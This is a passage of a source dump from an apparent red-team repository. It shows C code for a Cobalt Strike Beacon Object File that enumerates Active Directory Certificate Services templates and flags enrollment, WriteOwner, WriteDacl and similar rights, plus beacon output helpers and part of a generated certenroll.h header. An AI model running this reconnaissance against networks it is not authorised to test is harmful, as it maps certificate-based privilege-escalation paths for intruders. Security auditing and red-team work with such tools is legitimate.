	internal_printf("    Renewal Period           : %ld days (%ld seconds)\n", varProperty.lVal/86400, varProperty.lVal);

	// Get the TemplatePropSubjectNameFlags
	// See https://docs.microsoft.com/en-us/windows/win32/api/certenroll/ne-certenroll-x509certificatetemplatesubjectnameflag
	OLEAUT32$VariantClear(&varProperty);
	hr = pCertificateTemplate->lpVtbl->get_Property(pCertificateTemplate, TemplatePropSubjectNameFlags,	&varProperty);
	CHECK_RETURN_FAIL("pCertificateTemplate->lpVtbl->get_Property(TemplatePropSubjectNameFlags)", hr);
	internal_printf("    Name Flags               :");
	if(SubjectNameEnrolleeSupplies & varProperty.intVal) { internal_printf(" SubjectNameEnrolleeSupplies"); }
	if(SubjectNameRequireDirectoryPath & varProperty.intVal) { internal_printf(" SubjectNameRequireDirectoryPath"); }
	if(SubjectNameRequireCommonName & varProperty.intVal) { internal_printf(" SubjectNameRequireCommonName"); }
	if(SubjectNameRequireEmail & varProperty.intVal) { internal_printf(" SubjectNameRequireEmail"); }
	if(SubjectNameRequireDNS & varProperty.intVal) { internal_printf(" SubjectNameRequireDNS"); }
	if(SubjectNameAndAlternativeNameOldCertSupplies & varProperty.intVal) { internal_printf(" SubjectNameAndAlternativeNameOldCertSupplies"); }
	if(SubjectAlternativeNameEnrolleeSupplies & varProperty.intVal) { internal_printf(" SubjectAlternativeNameEnrolleeSupplies"); }
	if(SubjectAlternativeNameRequireDirectoryGUID & varProperty.intVal) { internal_printf(" SubjectAlternativeNameRequireDirectoryGUID"); }
	if(SubjectAlternativeNameRequireUPN & varProperty.intVal) { internal_printf(" SubjectAlternativeNameRequireUPN"); }
	if(SubjectAlternativeNameRequireEmail & varProperty.intVal) { internal_printf(" SubjectAlternativeNameRequireEmail"); }
	if(SubjectAlternativeNameRequireSPN & varProperty.intVal) { internal_printf(" SubjectAlternativeNameRequireSPN"); }
	if(SubjectAlternativeNameRequireDNS & varProperty.intVal) { internal_printf(" SubjectAlternativeNameRequireDNS"); }
	if(SubjectAlternativeNameRequireDomainDNS & varProperty.intVal) { internal_printf(" SubjectAlternativeNameRequireDomainDNS"); }
	internal_printf("\n");	

	// Get the TemplatePropEnrollmentFlags
	// See https://docs.microsoft.com/en-us/windows/win32/api/certenroll/ne-certenroll-x509certificatetemplateenrollmentflag
	OLEAUT32$VariantClear(&varProperty);
	hr = pCertificateTemplate->lpVtbl->get_Property(pCertificateTemplate, TemplatePropEnrollmentFlags, &varProperty);
	CHECK_RETURN_FAIL("pCertificateTemplate->lpVtbl->get_Property(TemplatePropEnrollmentFlags)", hr);
	internal_printf("    Enrollment Flags         :");
	if(EnrollmentIncludeSymmetricAlgorithms & varProperty.intVal) { internal_printf(" EnrollmentIncludeSymmetricAlgorithms"); }
	if(EnrollmentPendAllRequests & varProperty.intVal) { internal_printf(" EnrollmentPendAllRequests"); }
	if(EnrollmentPublishToKRAContainer & varProperty.intVal) { internal_printf(" EnrollmentPublishToKRAContainer"); }
	if(EnrollmentPublishToDS & varProperty.intVal) { internal_printf(" EnrollmentPublishToDS"); }
	if(EnrollmentAutoEnrollmentCheckUserDSCertificate & varProperty.intVal) { internal_printf(" EnrollmentAutoEnrollmentCheckUserDSCertificate"); }
	if(EnrollmentAutoEnrollment & varProperty.intVal) { internal_printf(" EnrollmentAutoEnrollment"); }
	if(EnrollmentDomainAuthenticationNotRequired & varProperty.intVal) { internal_printf(" EnrollmentDomainAuthenticationNotRequired"); }
	if(EnrollmentPreviousApprovalValidateReenrollment & varProperty.intVal) { internal_printf(" EnrollmentPreviousApprovalValidateReenrollment"); }
	if(EnrollmentUserInteractionRequired & varProperty.intVal) { internal_printf(" EnrollmentUserInteractionRequired"); }
	if(EnrollmentAddTemplateName & varProperty.intVal) { internal_printf(" EnrollmentAddTemplateName"); }
	if(EnrollmentRemoveInvalidCertificateFromPersonalStore & varProperty.intVal) { internal_printf(" EnrollmentRemoveInvalidCertificateFromPersonalStore"); }
	if(EnrollmentAllowEnrollOnBehalfOf & varProperty.intVal) { internal_printf(" EnrollmentAllowEnrollOnBehalfOf"); }
	if(EnrollmentAddOCSPNoCheck & varProperty.intVal) { internal_printf(" EnrollmentAddOCSPNoCheck"); }
	if(EnrollmentReuseKeyOnFullSmartCard & varProperty.intVal) { internal_printf(" EnrollmentReuseKeyOnFullSmartCard"); }
	if(EnrollmentNoRevocationInfoInCerts & varProperty.intVal) { internal_printf(" EnrollmentNoRevocationInfoInCerts"); }
	if(EnrollmentIncludeBasicConstraintsForEECerts & varProperty.intVal) { internal_printf(" EnrollmentIncludeBasicConstraintsForEECerts"); }
	internal_printf("\n");	

	// Get the TemplatePropRASignatureCount
	OLEAUT32$VariantClear(&varProperty);
	hr = pCertificateTemplate->lpVtbl->get_Property(pCertificateTemplate, TemplatePropRASignatureCount, &varProperty);
	CHECK_RETURN_FAIL("pCertificateTemplate->lpVtbl->get_Property(TemplatePropRASignatureCount)", hr);
	internal_printf("    Signatures Required      : %d\n", varProperty.intVal);

	// Get the TemplatePropEKUs
	OLEAUT32$VariantClear(&varProperty);
	pCertificateTemplate->lpVtbl->get_Property(pCertificateTemplate, TemplatePropEKUs, &varProperty);
	internal_printf("    Extended Key Usages      :\n");
	hr = _adcs_get_CertificateTemplateExtendedKeyUsages(&varProperty);
	CHECK_RETURN_FAIL("_adcs_get_CertificateTemplateExtendedKeyUsages", hr);
	
	// Get the TemplatePropKeySecurityDescriptor
	OLEAUT32$VariantClear(&varProperty);
	pCertificateTemplate->lpVtbl->get_Property(pCertificateTemplate, TemplatePropSecurityDescriptor, &varProperty);
	CHECK_RETURN_FAIL("pCertificateTemplate->lpVtbl->get_Property(TemplatePropSecurityDescriptor)", hr);
	internal_printf("    Permissions              :\n");
	hr = _adcs_get_CertificateTemplateSecurity(varProperty.bstrVal);
	CHECK_RETURN_FAIL("_adcs_get_CertificateTemplateSecurity", hr);
	
	hr = S_OK;

	//internal_printf("\n _adcs_get_CertificateTemplate SUCCESS.\n");

fail:

	OLEAUT32$VariantClear(&varProperty);

	return hr;
} // end _adcs_get_CertificateTemplate


HRESULT _adcs_get_CertificateTemplateExtendedKeyUsages(VARIANT* lpvarExtendedKeyUsages)
{
	HRESULT hr = S_OK;
	IObjectIds * pObjectIds = NULL;
	IEnumVARIANT *pEnum = NULL;
	LPUNKNOWN pUnk = NULL;
	VARIANT var;
	IDispatch *pDisp = NULL;
	ULONG lFetch = 0;
	IObjectId * pObjectId = NULL;
	BSTR bstFriendlyName = NULL;

	IID IID_IEnumVARIANT = { 0x00020404, 0x0000, 0x0000, {0xc0,0x00, 0x00,0x00,0x00,0x00,0x00,0x46} };
	IID IID_IObjectId = { 0x728ab300, 0x217d, 0x11da, {0XB2, 0XA4, 0x00, 0x0E, 0x7B, 0xBB, 0x2B, 0x09} };
	
	OLEAUT32$VariantInit(&var);
	
	if (NULL == lpvarExtendedKeyUsages->pdispVal)
	{
		internal_printf("      N/A\n");
		goto fail;
	}
	pObjectIds = (IObjectIds*)lpvarExtendedKeyUsages->pdispVal;
	pObjectIds->lpVtbl->get__NewEnum(pObjectIds, &pUnk);
	SAFE_RELEASE(pObjectIds);
	pUnk->lpVtbl->QueryInterface(pUnk, &IID_IEnumVARIANT, (void**) &pEnum);
	SAFE_RELEASE(pUnk);

	OLEAUT32$VariantInit(&var);
	hr = pEnum->lpVtbl->Next(pEnum, 1, &var, &lFetch);
	while(SUCCEEDED(hr) && lFetch > 0)
	{
		if (lFetch == 1)
		{
			pDisp = V_DISPATCH(&var);
			pDisp->lpVtbl->QueryInterface(pDisp, &IID_IObjectId, (void**)&pObjectId); 
			SAFE_RELEASE(pDisp);

			hr = pObjectId->lpVtbl->get_FriendlyName(
				pObjectId, 
				&bstFriendlyName
			);
			if (FAILED(hr))	{ internal_printf("      N/A\n"); }
			else { 
				internal_printf("      %S\n", bstFriendlyName); 
				SAFE_FREE(bstFriendlyName);
			}

			SAFE_RELEASE(pObjectId);
		}
		OLEAUT32$VariantClear(&var);

		hr = pEnum->lpVtbl->Next(pEnum, 1, &var, &lFetch);
	} // end loop through IObjectIds via enumerator
	SAFE_RELEASE(pObjectId);

	hr = S_OK;

	//internal_printf("\n _adcs_get_CertificateTemplateExtendedKeyUsages SUCCESS.\n");

fail:

	OLEAUT32$VariantClear(&var);

	return hr;
} // end _adcs_get_CertificateTemplateExtendedKeyUsages


HRESULT _adcs_get_CertificateTemplateSecurity(BSTR bstrDacl)
{
	HRESULT hr = S_OK;
	BOOL bReturn = TRUE;
	PSID pOwner = NULL;
	BOOL bOwnerDefaulted = TRUE;
	LPWSTR swzStringSid = NULL;
	WCHAR swzName[MAX_PATH];
	DWORD cchName = MAX_PATH;
	WCHAR swzDomainName[MAX_PATH];
	DWORD cchDomainName = MAX_PATH;
	BOOL bDaclPresent = TRUE;
	PACL pDacl = NULL;
	BOOL bDaclDefaulted = TRUE;
	ACL_SIZE_INFORMATION aclSizeInformation;
	SID_NAME_USE sidNameUse;
	PSECURITY_DESCRIPTOR pSD = NULL;
	ULONG ulSDSize = 0;

	// Get the security descriptor
	if (NULL == bstrDacl)
	{
		internal_printf("      N/A\n");
		goto fail;
	}
	bReturn = ADVAPI32$ConvertStringSecurityDescriptorToSecurityDescriptorW(bstrDacl, SDDL_REVISION_1, (PSECURITY_DESCRIPTOR)(&pSD), &ulSDSize);
	CHECK_RETURN_FALSE("ConvertStringSecurityDescriptorToSecurityDescriptorW()", bReturn, hr);

	// Get the owner
	bReturn = ADVAPI32$GetSecurityDescriptorOwner(pSD, &pOwner, &bOwnerDefaulted);
	CHECK_RETURN_FALSE("GetSecurityDescriptorOwner()", bReturn, hr);
	internal_printf("      Owner                  : ");
	cchName = MAX_PATH;
	MSVCRT$memset(swzName, 0, cchName*sizeof(WCHAR));
	cchDomainName = MAX_PATH;
	MSVCRT$memset(swzDomainName, 0, cchDomainName*sizeof(WCHAR));
	if (ADVAPI32$LookupAccountSidW(	NULL, pOwner, swzName, &cchName, swzDomainName, &cchDomainName, &sidNameUse )) { internal_printf("%S\\%S", swzDomainName, swzName); }
	else { internal_printf("N/A"); }

	// Get the owner's SID
	if (ADVAPI32$ConvertSidToStringSidW(pOwner, &swzStringSid)) { internal_printf("\n                              %S\n", swzStringSid); }
	else { internal_printf("\n                              N/A\n"); }
	SAFE_LOCAL_FREE(swzStringSid);

	// Get the DACL
	bReturn = ADVAPI32$GetSecurityDescriptorDacl(pSD, &bDaclPresent, &pDacl, &bDaclDefaulted);
	CHECK_RETURN_FALSE("GetSecurityDescriptorDacl()", bReturn, hr);
	internal_printf("      Access Rights         :\n");
	if (FALSE == bDaclPresent) { internal_printf("          N/A\n"); goto fail; }

	// Loop through ACEs in ACL
	if ( ADVAPI32$GetAclInformation( pDacl, &aclSizeInformation, sizeof(aclSizeInformation), AclSizeInformation ) )
	{
		for(DWORD dwAceIndex=0; dwAceIndex<aclSizeInformation.AceCount; dwAceIndex++)
		{
			ACE_HEADER * pAceHeader = NULL;
			ACCESS_ALLOWED_ACE* pAce = NULL;
			ACCESS_ALLOWED_OBJECT_ACE* pAceObject = NULL;
			PSID pPrincipalSid = NULL;
			hr = E_UNEXPECTED;

			if ( ADVAPI32$GetAce( pDacl, dwAceIndex, (LPVOID)&pAceHeader ) )
			{
				pAceObject = (ACCESS_ALLOWED_OBJECT_ACE*)pAceHeader;
				pAce = (ACCESS_ALLOWED_ACE*)pAceHeader;
				int format_ACCESS_ALLOWED_OBJECT_ACE = 0;

				if (ACCESS_ALLOWED_OBJECT_ACE_TYPE == pAceHeader->AceType) { 
					//internal_printf("        AceType: ACCESS_ALLOWED_OBJECT_ACE_TYPE\n");
					format_ACCESS_ALLOWED_OBJECT_ACE = 1;
					pPrincipalSid = (PSID)(&(pAceObject->InheritedObjectType)); 
				}
				else if (ACCESS_ALLOWED_ACE_TYPE == pAceHeader->AceType) { 
					//internal_printf("        AceType: ACCESS_ALLOWED_ACE_TYPE\n");
					pPrincipalSid = (PSID)(&(pAce->SidStart)); 
				}
				else { 
					continue; 
				}

				// Get the principal
				cchName = MAX_PATH;
				MSVCRT$memset(swzName, 0, cchName*sizeof(WCHAR));
				cchDomainName = MAX_PATH;
				MSVCRT$memset(swzDomainName, 0, cchDomainName*sizeof(WCHAR));
				if (FALSE == ADVAPI32$LookupAccountSidW( NULL, pPrincipalSid, swzName, &cchName, swzDomainName,	&cchDomainName,	&sidNameUse	))
				{ continue; }

				swzStringSid = NULL;
				if (ADVAPI32$ConvertSidToStringSidW(pPrincipalSid, &swzStringSid)) { 
					internal_printf("        Principal           : %S\\%S (%S)\n", swzDomainName, swzName,swzStringSid); }
				else { 
					internal_printf("        Principal           : %S\\%S (N/A)\n", swzDomainName, swzName); }
				SAFE_LOCAL_FREE(swzStringSid);

				// pAceObject->Mask is always equal to pAce->Mask, not "perfect" but seems to work
				internal_printf("          Access mask       : %08X\n", pAceObject->Mask);

				if (format_ACCESS_ALLOWED_OBJECT_ACE) {
					// flags not defined in ACCESS_ALLOWED_ACE_TYPE
					internal_printf("          Flags             : %08X\n", pAceObject->Flags);

					// Check if Enrollment permission
					if (ADS_RIGHT_DS_CONTROL_ACCESS & pAceObject->Mask)
					{
						if (ACE_OBJECT_TYPE_PRESENT & pAceObject->Flags)
						{
							if (
								(!MSVCRT$memcmp(&CertificateEnrollment, &pAceObject->ObjectType, sizeof (GUID))) ||
								(!MSVCRT$memcmp(&CertificateAutoEnrollment, &pAceObject->ObjectType, sizeof (GUID))) ||
								(!MSVCRT$memcmp(&CertificateAll, &pAceObject->ObjectType, sizeof (GUID)))
								)
							{
								internal_printf("                              Enrollment Rights\n");
							}
						} // end if ACE_OBJECT_TYPE_PRESENT
					} // end if ADS_RIGHT_DS_CONTROL_ACCESS
				}
				
				// Check if ADS_RIGHT_GENERIC_ALL permission
				if (ADS_RIGHT_GENERIC_ALL & pAceObject->Mask)
				{
					internal_printf("                              All Rights\n");
				} // end if ADS_RIGHT_GENERIC_ALL permission
				
				// Check if ADS_RIGHT_WRITE_OWNER permission
				if ( 
					(ADS_RIGHT_WRITE_OWNER & pAceObject->Mask)
				)
				{
					internal_printf("                              WriteOwner Rights\n");
				} // end if ADS_RIGHT_WRITE_OWNER permission
				
				// Check if ADS_RIGHT_WRITE_DAC permission
				if ( 
					(ADS_RIGHT_WRITE_DAC & pAceObject->Mask)
				)
				{
					internal_printf("                              WriteDacl Rights\n");
				} // end if ADS_RIGHT_WRITE_DAC permission
				
				
				// Check if ADS_RIGHT_GENERIC_WRITE permission
				if ( 
					(ADS_RIGHT_GENERIC_WRITE & pAceObject->Mask)
				)
				{
					internal_printf("                              WriteProperty Rights\n");
				} // end if ADS_RIGHT_GENERIC_WRITE permission

				// Check if ADS_RIGHT_DS_WRITE_PROP permission
				if ( 
					(ADS_RIGHT_DS_WRITE_PROP & pAceObject->Mask)
				)
				{
					if (format_ACCESS_ALLOWED_OBJECT_ACE) {

						internal_printf("                              WriteProperty Rights on ");
						OLECHAR szGuid[MAX_PATH];
						if ( OLE32$StringFromGUID2(&pAceObject->ObjectType, szGuid, MAX_PATH) )
						{
							internal_printf("%S\n", szGuid);
						}
						else
						{
							internal_printf("{ERROR}\n");
						}
					}
					else {
						// if ACCESS_OBJECT_ACE, there is no ACE_OBJECT_TYPE_PRESENT and ObjectType, so it's like a GENERIC_WRITE
						internal_printf("                              WriteProperty All Rights\n");
					}

				} // end if ADS_RIGHT_DS_WRITE_PROP permission

				
			} // end if GetAce was successful
		} // end for loop through ACEs (AceCount)

	} // end else GetAclInformation was successful

	hr = S_OK;

	//internal_printf("\n _adcs_get_CertificateTemplateSecurity SUCCESS.\n");

fail:

	SAFE_LOCAL_FREE(swzStringSid);
	SAFE_LOCAL_FREE(pSD);

	return hr;
} // end _adcs_get_CertificateTemplateSecurity



================================================
FILE: AD-BOF/ADCS-BOF/src/enum/adcs_enum_com2.h
================================================
#pragma once
#define WIN32_WINNT 0x0601
#include <windows.h>
#include <certcli.h>
#include "certenroll.h"
#include <stdint.h>


HRESULT _adcs_get_PolicyServerListManager();
HRESULT _adcs_get_PolicyServerUrl(IX509PolicyServerUrl * pPolicyServerUrl);
HRESULT _adcs_get_EnrollmentPolicyServer(BSTR bstrPolicyServerUrl, BSTR bstrPolicyServerId);
HRESULT _adcs_get_CertificationAuthority(ICertificationAuthority * pCertificateAuthority);
HRESULT _adcs_get_CertificationAuthorityCertificate(VARIANT* lpvarCertifcate);
HRESULT _adcs_get_CertificationAuthorityWebServers(VARIANT* lpvarWebServers);
HRESULT _adcs_get_CertificationAuthorityCertificateTypes(VARIANT* lpvarArray);
HRESULT _adcs_get_CertificationAuthoritySecurity(BSTR bstrDacl);
HRESULT _adcs_get_CertificateTemplate(IX509CertificateTemplate * pCertificateTemplate);
HRESULT _adcs_get_CertificateTemplateExtendedKeyUsages(VARIANT* lpvarExtendedKeyUsages);
HRESULT _adcs_get_CertificateTemplateSecurity(BSTR bstrDacl);

HRESULT adcs_enum_com2();



================================================
FILE: AD-BOF/ADCS-BOF/src/enum/base.c
================================================
#include <windows.h>
#include "bofdefs.h"
#include "beacon.h"
#ifndef bufsize
#define bufsize 8192
#endif




char * output __attribute__((section (".data"))) = 0;  // this is just done so its we don't go into .bss which isn't handled properly
WORD currentoutsize __attribute__((section (".data"))) = 0;
HANDLE trash __attribute__((section (".data"))) = NULL; // Needed for x64 to not give relocation error

#ifdef BOF
int bofstart();
void internal_printf(const char* format, ...);
void printoutput(BOOL done);
#endif
char * Utf16ToUtf8(const wchar_t* input);
#ifdef BOF
int bofstart()
{   
    output = (char*)MSVCRT$calloc(bufsize, 1);
    currentoutsize = 0;
    return 1;
}

void internal_printf(const char* format, ...){
    int buffersize = 0;
    int transfersize = 0;
    char * curloc = NULL;
    char* intBuffer = NULL;
    va_list args;
    va_start(args, format);
    buffersize = MSVCRT$vsnprintf(NULL, 0, format, args); // +1 because vsprintf goes to buffersize-1 , and buffersize won't return with the null
    va_end(args);
    
    // vsnprintf will return -1 on encoding failure (ex. non latin characters in Wide string)
    if (buffersize == -1)
        return;
    
    char* transferBuffer = (char*)intAlloc(bufsize);
    intBuffer = (char*)intAlloc(buffersize);
    /*Print string to memory buffer*/
    va_start(args, format);
    MSVCRT$vsnprintf(intBuffer, buffersize, format, args); // tmpBuffer2 has a null terminated string
    va_end(args);
    if(buffersize + currentoutsize < bufsize) // If this print doesn't overflow our output buffer, just buffer it to the end
    {
        //BeaconFormatPrintf(&output, intBuffer);
        memcpy(output+currentoutsize, intBuffer, buffersize);
        currentoutsize += buffersize;
    }
    else // If this print does overflow our output buffer, lets print what we have and clear any thing else as it is likely this is a large print
    {
        curloc = intBuffer;
        while(buffersize > 0)
        {
            transfersize = bufsize - currentoutsize; // what is the max we could transfer this request
            if(buffersize < transfersize) //if I have less then that, lets just transfer what's left
            {
                transfersize = buffersize;
            }
            memcpy(output+currentoutsize, curloc, transfersize); // copy data into our transfer buffer
            currentoutsize += transfersize;
            //BeaconFormatPrintf(&output, transferBuffer); // copy it to cobalt strikes output buffer
            if(currentoutsize == bufsize)
            {
            printoutput(FALSE); // sets currentoutsize to 0 and prints
            }
            memset(transferBuffer, 0, transfersize); // reset our transfer buffer
            curloc += transfersize; // increment by how much data we just wrote
            buffersize -= transfersize; // subtract how much we just wrote from how much we are writing overall
        }
    }
    intFree(intBuffer);
    intFree(transferBuffer);
}

void printoutput(BOOL done)
{

    char * msg = NULL;
    BeaconOutput(CALLBACK_OUTPUT, output, currentoutsize);
    currentoutsize = 0;
    memset(output, 0, bufsize);
    if(done) {MSVCRT$free(output); output=NULL;}
}
#else
#define internal_printf printf
#define printoutput 
#define bofstart 
#endif

// Changes to address issue #65.
// We can't use more dynamic resolve functions in this file, which means a call to HeapRealloc is unacceptable.
// To that end if you're going to use this function, declare how many libraries you'll be loading out of, multiple functions out of 1 library count as one
// Normallize your library name to uppercase, yes I could do it, yes I'm also lazy and putting that on the developer.
// Finally I'm going to assume actual string constants are passed in, which is to say don't pass in something to this you plan to free yourself
// If you must then free it after bofstop is called
#ifdef DYNAMIC_LIB_COUNT


typedef struct loadedLibrary {
    HMODULE hMod; // mod handle
    const char * name; // name normalized to uppercase
}loadedLibrary, *ploadedLibrary;
loadedLibrary loadedLibraries[DYNAMIC_LIB_COUNT] __attribute__((section (".data"))) = {0};
DWORD loadedLibrariesCount __attribute__((section (".data"))) = 0;

BOOL intstrcmp(LPCSTR szLibrary, LPCSTR sztarget)
{
    BOOL bmatch = FALSE;
    DWORD pos = 0;
    while(szLibrary[pos] && sztarget[pos])
    {
        if(szLibrary[pos] != sztarget[pos])
        {
            goto end;
        }
        pos++;
    }
    if(szLibrary[pos] | sztarget[pos]) // if either of these down't equal null then they can't match
        {goto end;}
    bmatch = TRUE;

    end:
    return bmatch;
}

//GetProcAddress, LoadLibraryA, GetModuleHandle, and FreeLibrary are gimmie functions
//
// DynamicLoad
// Retrieves a function pointer given the BOF library-function name
// szLibrary           - The library containing the function you want to load
// szFunction          - The Function that you want to load
// Returns a FARPROC function pointer if successful, or NULL if lookup fails
//
FARPROC DynamicLoad(const char * szLibrary, const char * szFunction)
{
    FARPROC fp = NULL;
    HMODULE hMod = NULL;
    DWORD i = 0;
    DWORD liblen = 0;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        if(intstrcmp(szLibrary, loadedLibraries[i].name))
        {
            hMod = loadedLibraries[i].hMod;
        }
    }
    if(!hMod)
    {
        hMod = LoadLibraryA(szLibrary);
        if(!hMod){ 
            BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\nCould not find library to load.", szLibrary);
            return NULL;
        }
        loadedLibraries[loadedLibrariesCount].hMod = hMod;
        loadedLibraries[loadedLibrariesCount].name = szLibrary; //And this is why this HAS to be a constant or not freed before bofstop
        loadedLibrariesCount++;
    }
    fp = GetProcAddress(hMod, szFunction);

    if (NULL == fp)
    {
        BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\n", szFunction);
    }
    return fp;
}
#endif


char* Utf16ToUtf8(const wchar_t* input)
{
    int ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        NULL,
        0,
        NULL,
        NULL
    );

    char* newString = (char*)intAlloc(sizeof(char) * ret);

    ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        newString,
        sizeof(char) * ret,
        NULL,
        NULL
    );

    if (0 == ret)
    {
        goto fail;
    }

retloc:
    return newString;
/*location to free everything centrally*/
fail:
    if (newString){
        intFree(newString);
        newString = NULL;
    };
    goto retloc;
}

//release any global functions here
void bofstop()
{
#ifdef DYNAMIC_LIB_COUNT
    DWORD i;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        FreeLibrary(loadedLibraries[i].hMod);
    }
#endif
	return;
}


================================================
FILE: AD-BOF/ADCS-BOF/src/enum/certenroll.h
================================================


/* this ALWAYS GENERATED file contains the definitions for the interfaces */


 /* File created by MIDL compiler version 7.00.0555 */
/* Compiler settings for certenroll.idl:
    Oicf, W1, Zp8, env=Win32 (32b run), target_arch=X86 7.00.0555 
    protocol : dce , ms_ext, c_ext, robust
    error checks: allocation ref bounds_check enum stub_data 
    VC __declspec() decoration level: 
         __declspec(uuid()), __declspec(selectany), __declspec(novtable)
         DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING(  ) */

#pragma warning( disable: 4049 )  /* more than 64k source lines */


/* verify that the <rpcndr.h> version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 500
#endif

/* verify that the <rpcsal.h> version is high enough to compile this file*/
#ifndef __REQUIRED_RPCSAL_H_VERSION__
#define __REQUIRED_RPCSAL_H_VERSION__ 100
#endif

#include <rpc.h>
#include <rpcndr.h>

#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of <rpcndr.h>
#endif // __RPCNDR_H_VERSION__

#ifndef COM_NO_WINDOWS_H
#include <windows.h>
#include <ole2.h>
#endif /*COM_NO_WINDOWS_H*/

#ifndef __certenroll_h__
#define __certenroll_h__

#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif

/* Forward Declarations */ 

#ifndef __IObjectId_FWD_DEFINED__
#define __IObjectId_FWD_DEFINED__
typedef interface IObjectId IObjectId;
#endif 	/* __IObjectId_FWD_DEFINED__ */


#ifndef __IObjectIds_FWD_DEFINED__
#define __IObjectIds_FWD_DEFINED__
typedef interface IObjectIds IObjectIds;
#endif 	/* __IObjectIds_FWD_DEFINED__ */


#ifndef __IBinaryConverter_FWD_DEFINED__
#define __IBinaryConverter_FWD_DEFINED__
typedef interface IBinaryConverter IBinaryConverter;
#endif 	/* __IBinaryConverter_FWD_DEFINED__ */


#ifndef __IX500DistinguishedName_FWD_DEFINED__
#define __IX500DistinguishedName_FWD_DEFINED__
typedef interface IX500DistinguishedName IX500DistinguishedName;
#endif 	/* __IX500DistinguishedName_FWD_DEFINED__ */


#ifndef __IX509EnrollmentStatus_FWD_DEFINED__
#define __IX509EnrollmentStatus_FWD_DEFINED__
typedef interface IX509EnrollmentStatus IX509EnrollmentStatus;
#endif 	/* __IX509EnrollmentStatus_FWD_DEFINED__ */


#ifndef __ICspAlgorithm_FWD_DEFINED__
#define __ICspAlgorithm_FWD_DEFINED__
typedef interface ICspAlgorithm ICspAlgorithm;
#endif 	/* __ICspAlgorithm_FWD_DEFINED__ */


#ifndef __ICspAlgorithms_FWD_DEFINED__
#define __ICspAlgorithms_FWD_DEFINED__
typedef interface ICspAlgorithms ICspAlgorithms;
#endif 	/* __ICspAlgorithms_FWD_DEFINED__ */


#ifndef __ICspInformation_FWD_DEFINED__
#define __ICspInformation_FWD_DEFINED__
typedef interface ICspInformation ICspInformation;
#endif 	/* __ICspInformation_FWD_DEFINED__ */


#ifndef __ICspInformations_FWD_DEFINED__
#define __ICspInformations_FWD_DEFINED__
typedef interface ICspInformations ICspInformations;
#endif 	/* __ICspInformations_FWD_DEFINED__ */


#ifndef __ICspStatus_FWD_DEFINED__
#define __ICspStatus_FWD_DEFINED__
typedef interface ICspStatus ICspStatus;
#endif 	/* __ICspStatus_FWD_DEFINED__ */


#ifndef __ICspStatuses_FWD_DEFINED__
#define __ICspStatuses_FWD_DEFINED__
typedef interface ICspStatuses ICspStatuses;
#endif 	/* __ICspStatuses_FWD_DEFINED__ */


#ifndef __IX509PublicKey_FWD_DEFINED__
#define __IX509PublicKey_FWD_DEFINED__
typedef interface IX509PublicKey IX509PublicKey;
#endif 	/* __IX509PublicKey_FWD_DEFINED__ */


#ifndef __IX509PrivateKey_FWD_DEFINED__
#define __IX509PrivateKey_FWD_DEFINED__
typedef interface IX509PrivateKey IX509PrivateKey;
#endif 	/* __IX509PrivateKey_FWD_DEFINED__ */


#ifndef __IX509Extension_FWD_DEFINED__
#define __IX509Extension_FWD_DEFINED__
typedef interface IX509Extension IX509Extension;
#endif 	/* __IX509Extension_FWD_DEFINED__ */


#ifndef __IX509Extensions_FWD_DEFINED__
#define __IX509Extensions_FWD_DEFINED__
typedef interface IX509Extensions IX509Extensions;
#endif 	/* __IX509Extensions_FWD_DEFINED__ */


#ifndef __IX509ExtensionKeyUsage_FWD_DEFINED__
#define __IX509ExtensionKeyUsage_FWD_DEFINED__
typedef interface IX509ExtensionKeyUsage IX509ExtensionKeyUsage;
#endif 	/* __IX509ExtensionKeyUsage_FWD_DEFINED__ */


#ifndef __IX509ExtensionEnhancedKeyUsage_FWD_DEFINED__
#define __IX509ExtensionEnhancedKeyUsage_FWD_DEFINED__
typedef interface IX509ExtensionEnhancedKeyUsage IX509ExtensionEnhancedKeyUsage;
#endif 	/* __IX509ExtensionEnhancedKeyUsage_FWD_DEFINED__ */


#ifndef __IX509ExtensionTemplateName_FWD_DEFINED__
#define __IX509ExtensionTemplateName_FWD_DEFINED__
typedef interface IX509ExtensionTemplateName IX509ExtensionTemplateName;
#endif 	/* __IX509ExtensionTemplateName_FWD_DEFINED__ */


#ifndef __IX509ExtensionTemplate_FWD_DEFINED__
#define __IX509ExtensionTemplate_FWD_DEFINED__
typedef interface IX509ExtensionTemplate IX509ExtensionTemplate;
#endif 	/* __IX509ExtensionTemplate_FWD_DEFINED__ */


#ifndef __IAlternativeName_FWD_DEFINED__
#define __IAlternativeName_FWD_DEFINED__
typedef interface IAlternativeName IAlternativeName;
#endif 	/* __IAlternativeName_FWD_DEFINED__ */


#ifndef __IAlternativeNames_FWD_DEFINED__
#define __IAlternativeNames_FWD_DEFINED__
typedef interface IAlternativeNames IAlternativeNames;
#endif 	/* __IAlternativeNames_FWD_DEFINED__ */


#ifndef __IX509ExtensionAlternativeNames_FWD_DEFINED__
#define __IX509ExtensionAlternativeNames_FWD_DEFINED__
typedef interface IX509ExtensionAlternativeNames IX509ExtensionAlternativeNames;
#endif 	/* __IX509ExtensionAlternativeNames_FWD_DEFINED__ */


#ifndef __IX509ExtensionBasicConstraints_FWD_DEFINED__
#define __IX509ExtensionBasicConstraints_FWD_DEFINED__
typedef interface IX509ExtensionBasicConstraints IX509ExtensionBasicConstraints;
#endif 	/* __IX509ExtensionBasicConstraints_FWD_DEFINED__ */


#ifndef __IX509ExtensionSubjectKeyIdentifier_FWD_DEFINED__
#define __IX509ExtensionSubjectKeyIdentifier_FWD_DEFINED__
typedef interface IX509ExtensionSubjectKeyIdentifier IX509ExtensionSubjectKeyIdentifier;
#endif 	/* __IX509ExtensionSubjectKeyIdentifier_FWD_DEFINED__ */


#ifndef __IX509ExtensionAuthorityKeyIdentifier_FWD_DEFINED__
#define __IX509ExtensionAuthorityKeyIdentifier_FWD_DEFINED__
